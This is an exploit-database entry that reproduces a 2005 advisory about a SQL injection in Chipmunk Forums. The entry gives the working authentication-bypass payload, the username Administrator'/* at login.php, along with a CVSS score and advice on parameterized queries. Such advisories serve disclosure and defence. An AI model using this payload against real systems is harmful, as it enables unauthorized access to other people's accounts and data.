header-logo
Suggest Exploit
vendor:
Chipmunk Forums
by:
milw0rm.com
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Chipmunk Forums
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

Chipmunk Forums SQL Injection Vulnerability

The vulnerability allows an attacker to execute arbitrary SQL queries by injecting malicious code into the login.php script. By entering the username as 'Administrator'/*, the attacker can bypass authentication and gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is important.
Source

Exploit-DB raw data:

/*==========================================*/
// GHC -> Chipmunk forum <- ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/

[exploit]
at login.php enter user name as
Administrator'/*

# milw0rm.com [2005-02-10]

Navigation

Suggest Exploit

Services By CQR